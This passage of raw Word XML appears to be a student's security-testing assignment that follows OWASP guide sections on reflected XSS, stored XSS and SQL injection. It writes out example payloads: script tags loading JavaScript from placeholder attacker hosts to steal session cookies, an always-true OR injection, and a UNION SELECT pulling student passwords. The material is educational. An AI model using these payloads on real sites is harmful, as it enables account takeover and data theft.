      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5A011B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located</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5A011B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between the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5A011B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wo</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="753C1C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rds</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="753C1C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“script” and “</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="753C1C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src</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1247B4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7CC6EB9B" w:rsidR="1247B4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as shown in the below ex</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1247B4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ample:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="R1d6989017e084ee7">
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3FAFC4F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http://ex</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1EBFCCD1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ample/?</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="696EC6C8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var=&lt;SCRIPT%</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4092BF6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20a=”</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4092BF6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&gt;”%</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4092BF6C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20SRC</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="16642019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=”https://attacker/xss.js</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="32D058FB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”&gt;</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1CC3614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&lt;/SCRIPT</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1CC3614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</w:p>
    <w:p w:rsidR="4CBF10A3" w:rsidP="7CC6EB9B" w:rsidRDefault="4CBF10A3" w14:paraId="1458B258" w14:textId="0CF612D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E007B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As can be seen above, the attribute </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7BAE6D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%20a=”&gt;”20 has been placed between </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4AB7CE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SCRIPT and SRC elements. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="26F49C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structure of the URL will result in the Java</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4CFC52B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7CC6EB9B" w:rsidR="26F49C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cript c</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2C26E8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ode on the attacker’s web server being executed as if it came from the website of the victim. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4CBF10A3" w:rsidP="7CC6EB9B" w:rsidRDefault="4CBF10A3" w14:paraId="51243885" w14:textId="10DEB5F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78E9AC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(OWASP Testing Guide, Version 4.0, 2011).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4CBF10A3" w:rsidP="7CC6EB9B" w:rsidRDefault="4CBF10A3" w14:paraId="2F5EE8F9" w14:textId="67FB594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78E9AC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Example 4: </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="634A3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Vulnerability Warning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3885A3DB" w:rsidP="7CC6EB9B" w:rsidRDefault="3885A3DB" w14:paraId="42547341" w14:textId="7A67DD7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634A3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Another </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="634A3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simple</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="634A3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but testable example of </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5A35BE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7CC6EB9B" w:rsidR="634A3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ef</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="170D00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lective</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="680B42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cross-site scripting would be to test for the presence of the vulnerability itself.</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="489780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can be done by creating a URL that </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="489780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contains</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="489780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warning whenever it detects cross-site scripting. An ex</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1D817B7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ample of this is shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3885A3DB" w:rsidP="7CC6EB9B" w:rsidRDefault="3885A3DB" w14:paraId="6EF7C2BA" w14:textId="70FC4F4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hyperlink r:id="R84e07ea2da51428f">
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1D817B70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</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0B0E268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//example.com/</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="337BABD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index.php?user&lt;script&gt;</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="337BABD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alert(</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="337BABD6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123)</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="15F8B642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&lt;</w:t>
        </w:r>
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="15F8B642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/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="15F8B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</w:p>
    <w:p w:rsidR="3885A3DB" w:rsidP="7CC6EB9B" w:rsidRDefault="3885A3DB" w14:paraId="660E5DE3" w14:textId="0A47D98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5F8B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(OWASP Testing Guide, Version 4.0, 2011).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3885A3DB" w:rsidP="7CC6EB9B" w:rsidRDefault="3885A3DB" w14:paraId="5613E904" w14:textId="1355160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15F8B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snippet of code called “</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="15F8B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alert(</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="15F8B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123) is inserted into this URL in between the “</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="03631A2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script” instances. What will happen when a tester enters it into a search engine, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="513526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pop-up window with the text “123” will appear. The text “123” stands in for a warn</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="59D68B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ing that </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6141FF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would notify the tester that the website or application they are testing is vulnerable to reflected cross-site scripting (</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="000EDF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OWASP Testing Guide, Version 4.0, 2011). This is </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="000EDF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great way</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="000EDF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discover </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="000EDF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vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="000EDF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before falling vi</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="045A4B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ctim to it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3885A3DB" w:rsidP="7CC6EB9B" w:rsidRDefault="3885A3DB" w14:paraId="4E6DD3DD" w14:textId="4DA1FE4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CC6EB9B" w:rsidR="1BE3550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Testing For Stored Cross-Site Scripting (OTG</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3C643D8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-INPVAL-002)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04DE92AD" w:rsidP="7CC6EB9B" w:rsidRDefault="04DE92AD" w14:paraId="3E712B44" w14:textId="3944598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3BC0B6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Stored Cross-Site Scripting </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="51D2766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(XSS) involves a web application storing unfiltered, or inco</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="378D7C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rrectly filtered, input from users. This results in </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4F3B68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malicious</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="36F2CF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 running </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="26341D9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within the website every time it is accessed</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3D73B7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7CC6EB9B" w:rsidR="447AB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1BCAF4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ttackers can </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="73DF1B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exploit this</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0D758C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perform many operations, from stealing valuable information, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="013375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taking over others’ browsers</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="519989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5A676034" w:rsidP="7CC6EB9B" w:rsidRDefault="5A676034" w14:paraId="2EAA2CE8" w14:textId="0856BA3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19989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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="519989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demonstrate</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="519989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vulnerability, the author uses two examples. One has been taken from external sources, while</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5542874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other is closely modeled after one found on the web (with all sources cited).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EF0A32C" w:rsidP="7CC6EB9B" w:rsidRDefault="1EF0A32C" w14:paraId="79850F4A" w14:textId="17295D2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3EA662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Example 1: Session Cookie Theft</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71645E02" w:rsidP="7CC6EB9B" w:rsidRDefault="71645E02" w14:paraId="5CB27E61" w14:textId="5CE7332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2C37AD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first example will be slightly </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2C37AD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similar to</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2C37AD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one used for reflective cross-site </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2C37AD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scripting,</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2C37AD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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5F3495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6726A6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that it</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5F3495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concerns an e-commerce website. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="732E6C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the website </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7CCF3DE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has a vulnerability allowing it to include HTML tags in the comments of the code,</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2DC25D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such as the &lt;script&gt; tag, the attacker may exploit it by entering the fo</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="11699A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llowing command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22C863E0" w:rsidP="7CC6EB9B" w:rsidRDefault="22C863E0" w14:paraId="7344ADA3" w14:textId="3FC4B5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7BAA0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&lt;p&gt; I highly recommend this </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="57BAA0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product!&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="07398D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/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7FBCC115" w:rsidP="7CC6EB9B" w:rsidRDefault="7FBCC115" w14:paraId="3A95D003" w14:textId="7BF352A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7398D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&lt;script </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="07398D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src</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="07398D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=”http://</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0C34192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malicious.com</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="08C7168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/exploit.js</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="08C7168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”&gt; &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4B2873E2" w:rsidP="7CC6EB9B" w:rsidRDefault="4B2873E2" w14:paraId="626704B6" w14:textId="013910C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8C7168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Because the above </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="660BAC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code is published on the website and stored within the system, it runs each time that the page is accessed</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6F5D98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by someone. Unlike in the case of reflecte</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3C8D94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 XSS, where a link must be clicked by a user for the code to run, in a stored XSS attack it is enough for the user to simply be on </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="518E5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page where the link is </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="518E5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located</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="518E5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r w:rsidRPr="7CC6EB9B" w:rsidR="1CB481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Moradov</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="518E5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2022). </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="518E5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 </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="09A630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particular example, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5FCB18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code, when run, steals a session cookie from a visitor.</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5FCB18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As cookies are meant to protect </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0E5391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user privacy, stealing </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0E5391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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0E5391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would give the attacker access to </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6B33E6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visitor’s account</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7B29DC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From there, they can access </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7B29DC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practically any</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7B29DC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piece of the user’s data, from credit card numbers and other financial information, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="74996C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even </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="74996C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purchase</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="74996C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products on their behalf </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="29AE44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(Moradov, 2022). </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="29AE44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Needless to say, just</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="29AE44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by getting the customer’s name, the attacker could commit identity theft.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E4315C4" w:rsidP="7CC6EB9B" w:rsidRDefault="7E4315C4" w14:paraId="747BC06A" w14:textId="583E53C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2C5765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Example 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3401A0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Inserting Code into </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3401A0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Cpmments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E4315C4" w:rsidP="7CC6EB9B" w:rsidRDefault="7E4315C4" w14:paraId="59FFEE6E" w14:textId="56E73A3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59994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following example, although </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="23908E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heavily modeled after one found on the web</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2CCC8C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(with the source cited), is an original contribution of the author. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="29A260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is based on a scenario where a vulnerability is discovered by an attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7D989A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which allows them to </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3248365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embed HTML tags into application code comments. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="445F2C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exploit this, they can </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2E2092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post a comment </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2E2092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containing</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2E2092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dangerous HTML JavaScript code, which the application does not sanitize. For example, let us ta</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="128EC4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ke a </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2D9EDD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gaming website, where people </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2D9EDD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frequently</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2D9EDD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leave reviews and recommendations, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="020D6A1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assume that a cybercriminal posted the following </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="18E839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comment and link:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="247FE9FC" w:rsidP="7CC6EB9B" w:rsidRDefault="247FE9FC" w14:paraId="14D68E77" w14:textId="5E72299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7CC6EB9B" w:rsidR="18E839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Get the new add-ons to </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="18E839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SuperRacer</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="18E8398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3 here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5A933E0A" w:rsidP="7CC6EB9B" w:rsidRDefault="5A933E0A" w14:paraId="20FB8423" w14:textId="64BF5FE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20D6A1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&lt;script </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="020D6A1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src</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="020D6A1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=”</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="112BDE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http://</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1F1417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badsite.com/dontclick.js</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1F1417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”&gt; &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0EA1DF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/script&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6CB79436" w:rsidP="7CC6EB9B" w:rsidRDefault="6CB79436" w14:paraId="3B4C2768" w14:textId="368EE6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2A571C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Each time a user goes to this website and lands on the page, even without clicking the link itself, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7A17D5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malicious JavaScript file, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7A17D5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located</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7A17D5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 another site, is activated, giving the hacker an opportunity to access, and steal, a</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3053EE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ll </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="43074E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user’s data (</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2E2BB8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GeeksForGeeks</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2E2BB8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2021).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3517B6EA" w:rsidP="7CC6EB9B" w:rsidRDefault="3517B6EA" w14:paraId="163E96E7" w14:textId="6E1DD7A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CC6EB9B" w:rsidR="402870F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Testing for SQL Injection (OTG-</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4E161E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INPVAL-005)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="146A2983" w:rsidP="7CC6EB9B" w:rsidRDefault="146A2983" w14:paraId="3756139E" w14:textId="12B36AA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CC6EB9B" w:rsidR="07ED20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Our next assigned task is to test the following code snippet for the vulnerability of SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4A3C9B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8DA7E99" w:rsidP="7CC6EB9B" w:rsidRDefault="08DA7E99" w14:paraId="588D03EA" w14:textId="78B3BB0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4A3C9B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* FROM Students WHERE EMPLID='$EMPLID' AND EMAIL='$email'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="08DA7E99" w:rsidP="7CC6EB9B" w:rsidRDefault="08DA7E99" w14:paraId="1CC23FBD" w14:textId="25AAD73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4A3C9B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 the explanation in the instructions, the code is taken from an HTML for</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="572A99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m. The variables preceded by “$” are the ones added by the user.</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="03CF5C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C6EB9B" w:rsidR="03CF5C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statement is indeed vulnerable to SQL injection, because o</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="21685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 the way that it is structured.</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="21685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Since it takes data</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4345F8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input </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="21685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directly from the user, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6A0EA1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attacker could enter the following:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="437C8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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="379E41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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="437C8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‘1=1’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="45B62FAA" w:rsidP="7CC6EB9B" w:rsidRDefault="45B62FAA" w14:paraId="139262C1" w14:textId="34DD8D5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437C8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making the statement look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6D860427" w:rsidP="7CC6EB9B" w:rsidRDefault="6D860427" w14:paraId="16AE99A1" w14:textId="7168C5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35865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* FROM Students WHERE EMPLID=</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3ACF40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C6EB9B" w:rsidR="3F2CC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r w:rsidRPr="7CC6EB9B" w:rsidR="3ACF40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7CC6EB9B" w:rsidR="2335F5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  <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3ACF40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7CC6EB9B" w:rsidR="0A31CF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r w:rsidRPr="7CC6EB9B" w:rsidR="649D0E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7CC6EB9B" w:rsidR="2E1840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  <w:r w:rsidRPr="7CC6EB9B" w:rsidR="649D0E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7CC6EB9B" w:rsidR="09A0F3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C6EB9B" w:rsidR="59EBE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r w:rsidRPr="7CC6EB9B" w:rsidR="649D0E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7CC6EB9B" w:rsidR="4467E9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 AND EMAIL=</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="37EB19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‘1</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5CCED4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 OR ‘1’ = ‘1’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="731BA130" w:rsidP="7CC6EB9B" w:rsidRDefault="731BA130" w14:paraId="187BA184" w14:textId="49A54B1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0EEEB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Because </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4F80EF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condition ‘1</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="03CC4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  <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4F80EF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7CC6EB9B" w:rsidR="787A51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‘</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4F80EF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1’ is always true, the query will end up selecting </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="40B7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every student from the</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="40B7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C6EB9B" w:rsidR="40B7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  <w:r w:rsidRPr="7CC6EB9B" w:rsidR="40B7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CC6EB9B" w:rsidR="40B701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table, and not just the one with the specific </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7FB1B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email and ID. The repercussions of this are obvious, as the attacker will now be able to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access, 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exploit data for all students. For example, they could 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grade, use </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="011206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of the names </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="40D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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="44457E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 identity theft, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="66A6F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perform illicit operations using a student’s financial information, or even </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="66A6F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7CC6EB9B" w:rsidR="66A6F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entire Students table. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7E2BAC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last action would throw the entire educational institution into chaos, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="73D92F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as, along with the table, the data for all its students would be lost.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="476605FE" w:rsidP="7CC6EB9B" w:rsidRDefault="476605FE" w14:paraId="42504560" w14:textId="7A70F84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7CC6EB9B" w:rsidR="0B832A3D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Tests I Would Use:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C14AA3D" w:rsidP="7CC6EB9B" w:rsidRDefault="0C14AA3D" w14:paraId="2B2E50BA" w14:textId="67FB7B5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1BA36D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test this vulnerability, in addition to </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="628FF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already </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="628FF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7CC6EB9B" w:rsidR="628FF1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‘1=1’ insertion, I would also perform</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5277C6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UNION exploitation. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="79C93E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testing method involves appending a query engineered by the attacker to the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="10DFD9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regular query of the code. To test the query given to us, we will give the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="011934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following value to both the student ID and email</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4411F1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F330E3" w:rsidP="7CC6EB9B" w:rsidRDefault="00F330E3" w14:paraId="55241EA3" w14:textId="2386E33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4F123D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EMPLID</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="011934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=1 UNION ALL SELECT </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="76009C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studentPassword</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="76009C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1, 1 FR</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4C871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OM </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4C871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  <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5E18F8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Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37AD8761" w:rsidP="7CC6EB9B" w:rsidRDefault="37AD8761" w14:paraId="784CCAD6" w14:textId="1729371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51FF13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Such input would make the query look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6B8D6A3B" w:rsidP="7CC6EB9B" w:rsidRDefault="6B8D6A3B" w14:paraId="642995C2" w14:textId="626A0E3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7BDE22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* FROM Students WHERE EMPLID= 1</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="04700F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UNION ALL SELECT </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="04700F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studentPassword</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="04700F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1, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="45BA0E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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="04700F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CC6EB9B" w:rsidR="04700F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7CC6EB9B" w:rsidR="4BFF95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StudentCredentials</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4BFF95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EMAIL=1 UNION ALL SELECT </w:t>
      </w:r>
